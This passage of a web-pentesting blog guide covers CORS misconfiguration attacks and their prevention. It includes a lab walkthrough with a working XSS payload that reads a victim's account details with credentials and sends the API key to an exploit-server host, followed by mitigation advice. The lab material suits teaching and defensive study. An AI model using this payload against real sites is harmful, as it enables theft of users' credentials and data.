</pre></td><td class="rouge-code"><pre><span class="nb">document</span><span class="p">.</span><span class="nx">location</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">https://subdomain.vulnerable-website.com/?xss=&lt;script&gt;/*malicious code*/&lt;/script&gt;</span><span class="dl">'</span><span class="p">;</span>
</pre></td></tr></tbody></table></code></div></div>

<p>The injected script would make a cross-origin request to <code class="language-plaintext highlighter-rouge">vulnerable-website.com</code> and exfiltrate sensitive information using the trust relationship established by CORS.</p>

<hr />

<h2 id="breaking-tls-with-poorly-configured-cors"><span class="me-2">Breaking TLS with Poorly Configured CORS</span><a href="#breaking-tls-with-poorly-configured-cors" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>A poorly configured CORS policy can undermine the security benefits of HTTPS. For instance, if an application that strictly enforces HTTPS whitelists a trusted subdomain that uses plain HTTP, it creates a vulnerability. Consider the following request:</p>

<div class="language-http highlighter-rouge"><div class="code-header">
        <span data-label-text="Http"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="nf">GET</span> <span class="nn">/api/requestApiKey</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span>
<span class="na">Host</span><span class="p">:</span> <span class="s">vulnerable-website.com</span>
<span class="na">Origin</span><span class="p">:</span> <span class="s">http://trusted-subdomain.vulnerable-website.com</span>
<span class="na">Cookie</span><span class="p">:</span> <span class="s">sessionid=...</span>
</pre></td></tr></tbody></table></code></div></div>

<p>If the server responds with:</p>

<div class="language-http highlighter-rouge"><div class="code-header">
        <span data-label-text="Http"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="m">200</span> <span class="ne">OK</span>
<span class="na">Access-Control-Allow-Origin</span><span class="p">:</span> <span class="s">http://trusted-subdomain.vulnerable-website.com</span>
<span class="na">Access-Control-Allow-Credentials</span><span class="p">:</span> <span class="s">true</span>
</pre></td></tr></tbody></table></code></div></div>

<p>This means that <code class="language-plaintext highlighter-rouge">vulnerable-website.com</code> trusts requests from <code class="language-plaintext highlighter-rouge">http://trusted-subdomain.vulnerable-website.com</code>, even though the subdomain uses plain HTTP. An attacker could intercept or manipulate the insecure HTTP traffic to steal sensitive data or perform malicious actions.</p>

<hr />

<h3 id="example-exercise-exploiting-cors-misconfiguration-via-xss"><span class="me-2">Example Exercise: Exploiting CORS Misconfiguration via XSS</span><a href="#example-exercise-exploiting-cors-misconfiguration-via-xss" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<h4 id="step-by-step-walkthrough"><span class="me-2">Step-by-Step Walkthrough</span><a href="#step-by-step-walkthrough" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<ol>
  <li><strong>Initial Setup: Logging In and Observing Behavior</strong>
    <ul>
      <li><strong>Turn Off Intercept in Burp Suite</strong>: Ensure that intercept is turned off so your browser can communicate with the target application without interruptions.</li>
      <li><strong>Log In and Access Your Account Page</strong>: Use Burp’s built-in browser to log in to your account and navigate to the account page.</li>
      <li><strong>Inspect the AJAX Request</strong>: Open the <strong>HTTP history</strong> in Burp Suite and observe that your account details (including sensitive information like your API key) are retrieved via an AJAX request to <code class="language-plaintext highlighter-rouge">/accountDetails</code>.</li>
      <li><strong>Check for CORS Headers</strong>: Look at the response headers for this request. Specifically, check for the presence of the <code class="language-plaintext highlighter-rouge">Access-Control-Allow-Credentials: true</code> header, which suggests that the server supports CORS.</li>
    </ul>
  </li>
  <li><strong>Testing the CORS Configuration</strong>
    <ul>
      <li><strong>Send the Request to Burp Repeater</strong>: Right-click on the <code class="language-plaintext highlighter-rouge">/accountDetails</code> request in Burp’s HTTP history and select <strong>“Send to Repeater”</strong>.</li>
      <li><strong>Add the <code class="language-plaintext highlighter-rouge">Origin</code> Header</strong>: Modify the request by adding the following header:
        <div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>Origin: http://stock.YOUR-LAB-ID.web-security-academy.net
</pre></td></tr></tbody></table></code></div>        </div>
      </li>
      <li><strong>Resubmit the Request</strong>: Send the modified request and observe the server’s response. If the <code class="language-plaintext highlighter-rouge">Origin</code> is reflected in the <code class="language-plaintext highlighter-rouge">Access-Control-Allow-Origin</code> header, it confirms that the CORS configuration allows access from arbitrary subdomains, including both HTTPS and HTTP.</li>
    </ul>
  </li>
  <li><strong>Identifying an XSS Vulnerability</strong>
    <ul>
      <li><strong>Open a Product Page</strong>: Navigate to a product page and click <strong>“Check stock”</strong>.</li>
      <li><strong>Observe the HTTP URL</strong>: Notice that the stock-checking functionality is loaded using an HTTP URL on a subdomain (e.g., <code class="language-plaintext highlighter-rouge">http://stock.YOUR-LAB-ID.web-security-academy.net</code>).</li>
      <li><strong>Test for XSS</strong>: Observe that the <code class="language-plaintext highlighter-rouge">productID</code> parameter is vulnerable to XSS. For example, you can inject a payload like <code class="language-plaintext highlighter-rouge">&lt;script&gt;alert(1)&lt;/script&gt;</code> into the <code class="language-plaintext highlighter-rouge">productID</code> parameter to confirm the vulnerability.</li>
    </ul>
  </li>
  <li><strong>Crafting the Exploit</strong>
    <ul>
      <li><strong>Go to the Exploit Server</strong>: Navigate to the exploit server provided in the lab environment.</li>
      <li>
        <p><strong>Enter the Malicious HTML Code</strong>: Paste the following HTML code into the exploit server’s input field. Replace <code class="language-plaintext highlighter-rouge">YOUR-LAB-ID</code> with your unique lab domain name and <code class="language-plaintext highlighter-rouge">YOUR-EXPLOIT-SERVER-ID</code> with your exploit server ID:</p>

        <div class="language-html highlighter-rouge"><div class="code-header">
        <span data-label-text="HTML"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="nt">&lt;script&gt;</span>
    <span class="nb">document</span><span class="p">.</span><span class="nx">location</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">http://stock.YOUR-LAB-ID.web-security-academy.net/?productId=&lt;script&gt;var req = new XMLHttpRequest();req.onload=reqListener;req.open("get","https://YOUR-LAB-ID.web-security-academy.net/accountDetails",true);req.withCredentials=true;req.send();function reqListener(){location="https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key="+this.responseText;};</span><span class="nt">&lt;/script&gt;</span>';
<span class="nt">&lt;/script&gt;</span>
</pre></td></tr></tbody></table></code></div>        </div>

        <p><strong>Explanation of the Code</strong>:</p>
        <ul>
          <li>The <code class="language-plaintext highlighter-rouge">document.location</code> redirects the victim to the vulnerable subdomain (<code class="language-plaintext highlighter-rouge">stock.YOUR-LAB-ID.web-security-academy.net</code>) with an XSS payload embedded in the <code class="language-plaintext highlighter-rouge">productID</code> parameter.</li>
          <li>The injected script makes a CORS request to <code class="language-plaintext highlighter-rouge">/accountDetails</code> on the main domain (<code class="language-plaintext highlighter-rouge">YOUR-LAB-ID.web-security-academy.net</code>) to retrieve the victim’s API key.</li>
          <li>The API key is then exfiltrated to the exploit server by appending it as a query parameter in the URL.</li>
        </ul>
      </li>
    </ul>
  </li>
  <li><strong>Testing the Exploit</strong>
    <ul>
      <li><strong>View the Exploit</strong>: Click the <strong>“View exploit”</strong> button on the exploit server to simulate a victim visiting the malicious page.</li>
      <li><strong>Observe the Result</strong>: After viewing the exploit, you should be redirected to the <code class="language-plaintext highlighter-rouge">/log</code> page on the exploit server. Check the URL—it should now include the victim’s API key as part of the query string.</li>
    </ul>
  </li>
  <li><strong>Delivering the Exploit to the Victim</strong>
    <ul>
      <li><strong>Deliver the Exploit</strong>: Once you’ve confirmed that the exploit works, click the <strong>“Deliver exploit to victim”</strong> button to simulate sending the malicious link to the victim.</li>
      <li><strong>Access the Log</strong>: Go back to the exploit server and click <strong>“Access log”</strong>. Retrieve the victim’s API key from the log and submit it to complete the lab.</li>
    </ul>
  </li>
</ol>

<hr />

<h2 id="intranets-and-cors-without-credentials"><span class="me-2">Intranets and CORS Without Credentials</span><a href="#intranets-and-cors-without-credentials" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Most CORS attacks rely on the presence of the following response header:</p>

<div class="language-http highlighter-rouge"><div class="code-header">
        <span data-label-text="Http"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="err">Access-Control-Allow-Credentials: true
</span></pre></td></tr></tbody></table></code></div></div>

<p>This header allows the victim’s browser to send cookies and other credentials with cross-origin requests. Without this header, the browser will <strong>refuse to send cookies</strong>, meaning the attacker will only gain access to <strong>unauthenticated content</strong>. In such cases, the attacker could just as easily access the same content by browsing directly to the target website.</p>

<p>However, there is one common scenario where an attacker <strong>cannot access a website directly</strong>: when the target is part of an organization’s <strong>intranet</strong> and located within private IP address space. Internal websites are often held to a lower security standard than external sites, making them more vulnerable to exploitation. Attackers can leverage these vulnerabilities to gain further access within the private network.</p>

<hr />

<h3 id="example-scenario-exploiting-cors-in-an-intranet"><span class="me-2">Example Scenario: Exploiting CORS in an Intranet</span><a href="#example-scenario-exploiting-cors-in-an-intranet" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<h4 id="request"><span class="me-2">Request</span><a href="#request" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<div class="language-http highlighter-rouge"><div class="code-header">
        <span data-label-text="Http"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="err">GET /reader?url=doc1.pdf
Host: intranet.normal-website.com
Origin: https://external-site.com
</span></pre></td></tr></tbody></table></code></div></div>

<h4 id="response"><span class="me-2">Response</span><a href="#response" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<div class="language-http highlighter-rouge"><div class="code-header">
        <span data-label-text="Http"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="m">200</span> <span class="ne">OK</span>
<span class="na">Access-Control-Allow-Origin</span><span class="p">:</span> <span class="s">*</span>
</pre></td></tr></tbody></table></code></div></div>

<h4 id="key-observations"><span class="me-2">Key Observations</span><a href="#key-observations" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<ol>
  <li><strong>Unrestricted Access (<code class="language-plaintext highlighter-rouge">Access-Control-Allow-Origin: *</code>)</strong>:
    <ul>
      <li>The server responds with <code class="language-plaintext highlighter-rouge">Access-Control-Allow-Origin: *</code>, allowing any origin to access the resource.</li>
      <li>Since no credentials are required (<code class="language-plaintext highlighter-rouge">Access-Control-Allow-Credentials</code> is absent), the attacker cannot retrieve sensitive data tied to the user’s session (e.g., cookies or tokens).</li>
    </ul>
  </li>
  <li><strong>Internal Network Context</strong>:
    <ul>
      <li>The target (<code class="language-plaintext highlighter-rouge">intranet.normal-website.com</code>) is part of the organization’s internal network and is not directly accessible from the public internet.</li>
      <li>Attackers cannot browse to this site directly but can exploit CORS misconfigurations to probe or interact with it indirectly.</li>
    </ul>
  </li>
  <li><strong>Potential for Exploitation</strong>:
    <ul>
      <li>Even without credentials, attackers can use CORS to access <strong>unauthenticated content</strong> hosted on the intranet.</li>
      <li>For example, they might retrieve sensitive documents, configuration files, or other resources that are publicly accessible within the private network.</li>
    </ul>
  </li>
</ol>

<hr />

<h3 id="why-this-matters"><span class="me-2">Why This Matters</span><a href="#why-this-matters" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<ol>
  <li><strong>Lower Security Standards for Internal Sites</strong>:
    <ul>
      <li>Internal websites are often less rigorously secured than external-facing applications. Developers may assume that these sites are safe because they are hidden behind a firewall or NAT.</li>
      <li>Misconfigured CORS policies on internal sites can expose them to attacks from compromised machines within the network or through malicious external actors exploiting vulnerabilities like SSRF (Server-Side Request Forgery).</li>
    </ul>
  </li>
  <li><strong>Access to Unauthenticated Content</strong>:
    <ul>
      <li>While unauthenticated content may seem harmless, it can still contain sensitive information such as internal documentation, API endpoints, or debugging tools.</li>
      <li>Attackers can use this information to escalate their privileges or pivot to other parts of the network.</li>
    </ul>
  </li>
  <li><strong>Exploiting Trust Relationships</strong>:
    <ul>
      <li>Many organizations trust their internal systems implicitly, even when those systems are poorly secured.</li>
      <li>A misconfigured CORS policy on an internal site can allow attackers to bypass network segmentation and access resources they should not be able to reach.</li>
    </ul>
  </li>
</ol>

<hr />

<h3 id="mitigation-strategies"><span class="me-2">Mitigation Strategies</span><a href="#mitigation-strategies" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<ol>
  <li><strong>Restrict <code class="language-plaintext highlighter-rouge">Access-Control-Allow-Origin</code></strong>:
    <ul>
      <li>Avoid using <code class="language-plaintext highlighter-rouge">Access-Control-Allow-Origin: *</code> unless absolutely necessary. Instead, explicitly whitelist trusted origins.</li>
    </ul>
  </li>
  <li><strong>Disable CORS for Sensitive Endpoints</strong>:
    <ul>
      <li>For internal APIs or resources that do not need to be accessed cross-origin, disable CORS entirely.</li>
    </ul>
  </li>
  <li><strong>Implement Network Segmentation</strong>:
    <ul>
      <li>Ensure that internal websites are properly isolated from external networks and that only authorized users and systems can access them.</li>
    </ul>
  </li>
  <li><strong>Regular Security Audits</strong>:
    <ul>
      <li>Regularly audit internal systems for vulnerabilities, including CORS misconfigurations, to prevent attackers from exploiting them.</li>
    </ul>
  </li>
</ol>

<hr />

<h2 id="preventing-cors-based-attacks"><span class="me-2">Preventing CORS-Based Attacks</span><a href="#preventing-cors-based-attacks" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>CORS vulnerabilities primarily arise due to <strong>misconfigurations</strong> in how cross-origin requests are handled. As such, preventing these attacks is largely a matter of proper configuration. Below are some effective strategies to defend against CORS-based attacks.</p>

<hr />

<h3 id="1-proper-configuration-of-cross-origin-requests"><span class="me-2">1. Proper Configuration of Cross-Origin Requests</span><a href="#1-proper-configuration-of-cross-origin-requests" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>If a web resource contains sensitive information, the <code class="language-plaintext highlighter-rouge">Access-Control-Allow-Origin</code> header should be carefully and explicitly configured. Avoid overly permissive settings that could expose your application to unnecessary risks.</p>

<h4 id="key-recommendations"><span class="me-2">Key Recommendations:</span><a href="#key-recommendations" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<ul>
  <li>
    <p><strong>Specify Trusted Origins Explicitly</strong>:</p>

    <p>Only allow trusted origins in the <code class="language-plaintext highlighter-rouge">Access-Control-Allow-Origin</code> header. For example:</p>

    <div class="language-http highlighter-rouge"><div class="code-header">
        <span data-label-text="Http"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="err">Access-Control-Allow-Origin: https://trusted-domain.com
</span></pre></td></tr></tbody></table></code></div>    </div>

    <p>This ensures that only requests from explicitly trusted domains are permitted.</p>
  </li>
  <li>
    <p><strong>Avoid Dynamically Reflecting Origins Without Validation</strong>:</p>

    <p>Dynamically reflecting the value of the <code class="language-plaintext highlighter-rouge">Origin</code> header (e.g., copying it directly into the <code class="language-plaintext highlighter-rouge">Access-Control-Allow-Origin</code> response) without proper validation is highly exploitable. Always validate the origin against a whitelist of trusted domains before allowing access.</p>
  </li>
</ul>

<hr />

<h3 id="2-only-allow-trusted-sites"><span class="me-2">2. Only Allow Trusted Sites</span><a href="#2-only-allow-trusted-sites" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>This may seem obvious, but it bears repeating: <strong>only trusted sites should be specified in the <code class="language-plaintext highlighter-rouge">Access-Control-Allow-Origin</code> header</strong>. Misconfigured or overly permissive CORS policies can lead to serious security vulnerabilities.</p>

<h4 id="why-it-matters"><span class="me-2">Why It Matters:</span><a href="#why-it-matters" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<ul>
  <li>Allowing untrusted origins can enable attackers to bypass the same-origin policy and access sensitive resources.</li>
  <li>For example, an attacker could exploit a misconfigured CORS policy to steal private data or perform unauthorized actions on behalf of a user.</li>
</ul>

<hr />

<h3 id="3-avoid-whitelisting-null"><span class="me-2">3. Avoid Whitelisting <code class="language-plaintext highlighter-rouge">null</code></span><a href="#3-avoid-whitelisting-null" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Avoid using the following header:</p>

<div class="language-http highlighter-rouge"><div class="code-header">
        <span data-label-text="Http"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="err">Access-Control-Allow-Origin: null
</span></pre></td></tr></tbody></table></code></div></div>

<h4 id="why-its-dangerous"><span class="me-2">Why It’s Dangerous:</span><a href="#why-its-dangerous" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<ul>
  <li>The <code class="language-plaintext highlighter-rouge">null</code> origin can be specified in certain edge cases, such as:
    <ul>
      <li>Requests from internal documents (e.g., <code class="language-plaintext highlighter-rouge">file://</code> URLs).</li>
      <li>Sandboxed iframes with restricted permissions.</li>
    </ul>
  </li>
  <li>Allowing <code class="language-plaintext highlighter-rouge">null</code> as a valid origin can inadvertently grant access to malicious actors who craft requests with this origin.</li>
</ul>

<h4 id="best-practice"><span class="me-2">Best Practice:</span><a href="#best-practice" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<ul>
  <li>Define CORS headers with respect to <strong>explicitly trusted origins</strong> for both private and public servers. Never use <code class="language-plaintext highlighter-rouge">null</code> as a valid origin unless absolutely necessary, and even then, ensure strict validation.</li>
</ul>

<hr />

<h3 id="4-avoid-wildcards-in-internal-networks"><span class="me-2">4. Avoid Wildcards in Internal Networks</span><a href="#4-avoid-wildcards-in-internal-networks" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Avoid using wildcards (<code class="language-plaintext highlighter-rouge">*</code>) in internal networks. While wildcards may seem convenient, they can introduce significant risks, especially in environments where sensitive data is stored.</p>

<h4 id="why-its-dangerous-1"><span class="me-2">Why It’s Dangerous:</span><a href="#why-its-dangerous-1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<ul>
  <li>Using <code class="language-plaintext highlighter-rouge">Access-Control-Allow-Origin: *</code> allows any website to access your resources, which is particularly risky for internal APIs or services.</li>
  <li>Trusting network configuration alone (e.g., firewalls or NAT) to protect internal resources is insufficient. If an internal browser accesses an untrusted external domain, it could expose sensitive data to attackers.</li>
</ul>

<h4 id="best-practice-1"><span class="me-2">Best Practice:</span><a href="#best-practice-1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<ul>
  <li>
    <p>Explicitly whitelist trusted origins, even for internal services. For example:</p>

    <div class="language-http highlighter-rouge"><div class="code-header">
        <span data-label-text="Http"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="err">Access-Control-Allow-Origin: https://internal-service.trusted-domain.com
</span></pre></td></tr></tbody></table></code></div>    </div>
  </li>
</ul>

<hr />

<h3 id="5-cors-is-not-a-substitute-for-server-side-security-policies"><span class="me-2">5. CORS Is Not a Substitute for Server-Side Security Policies</span><a href="#5-cors-is-not-a-substitute-for-server-side-security-policies" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>It’s crucial to understand that <strong>CORS is not a replacement for server-side security measures</strong>. CORS defines browser behavior but does not inherently protect sensitive data on the server.</p>

<h4 id="why-it-matters-1"><span class="me-2">Why It Matters:</span><a href="#why-it-matters-1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<ul>
  <li>An attacker can directly forge requests from trusted origins, bypassing CORS entirely. For example, tools like <code class="language-plaintext highlighter-rouge">curl</code> or Postman can send requests without adhering to CORS restrictions.</li>
  <li>Therefore, sensitive data must always be protected using additional server-side mechanisms, such as:
    <ul>
      <li><strong>Authentication</strong>: Ensure that only authorized users can access sensitive resources.</li>
      <li><strong>Session Management</strong>: Use secure session tokens and enforce proper session expiration policies.</li>
      <li><strong>Input Validation</strong>: Validate all inputs to prevent injection attacks and other vulnerabilities.</li>
    </ul>
  </li>
</ul>

<hr />

<h2 id="summary-of-key-points"><span class="me-2">Summary of Key Points</span><a href="#summary-of-key-points" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<ol>
  <li><strong>Explicitly Specify Trusted Origins</strong>:
    <ul>
      <li>Avoid dynamically reflecting origins or using wildcards (<code class="language-plaintext highlighter-rouge">*</code>) in the <code class="language-plaintext highlighter-rouge">Access-Control-Allow-Origin</code> header.</li>
    </ul>
  </li>
  <li><strong>Avoid Whitelisting <code class="language-plaintext highlighter-rouge">null</code></strong>:
    <ul>
      <li>The <code class="language-plaintext highlighter-rouge">null</code> origin can be exploited in edge cases, so it should never be used as a valid origin.</li>
    </ul>
  </li>
  <li><strong>Secure Internal Networks</strong>:
    <ul>
      <li>Even in internal networks, avoid wildcards and explicitly whitelist trusted origins to prevent unauthorized access.</li>
    </ul>
  </li>
  <li><strong>Combine CORS with Server-Side Protections</strong>:
    <ul>
      <li>CORS is not a substitute for server-side security. Always implement authentication, session management, and input validation to protect sensitive data.</li>
    </ul>
  </li>
</ol>


  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/guides/">Guides</a>,
          <a href="/categories/web-pentesting/">Web Pentesting</a>
      </div>
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/guides/"
            class="post-tag no-text-decoration"
          >Guides</a>
        
          <a
            href="/tags/csrf/"
            class="post-tag no-text-decoration"
          >CSRF</a>
        
          <a
            href="/tags/web-pentesting/"
            class="post-tag no-text-decoration"
          >Web Pentesting</a>
        
      </div>
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://github.com/Diogo-Lages" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Github" aria-label="Github">
        <i class="fa-fw fab fa-github"></i>
      </a>
    

      

      <a href="https://www.linkedin.com/in/diogo-lages/" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Linkedin" aria-label="Linkedin">
        <i class="fa-fw fab fa-linkedin"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/python-deep-dork">Deep Dork</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/python-network-scanner">Network Scanner</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/python-honeypot-suite">Honeypot Suite</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/csrf-guide">Cross-Site Request Forgery (CSRF)</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/python-web-scraper">Web Scraper and Crawling Tool</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/python/">Python</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/guides/">Guides</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/exploits/">Exploits</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/web-pentesting/">Web Pentesting</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/csrf/">CSRF</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/tools/">Tools</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/2fa-bypass/">2FA Bypass</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/advanced-search/">Advanced Search</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/anonymity/">Anonymity</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/browser-extensions/">Browser Extensions</a>
      
    </div>
  </section>

            </div>

            
              
              






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


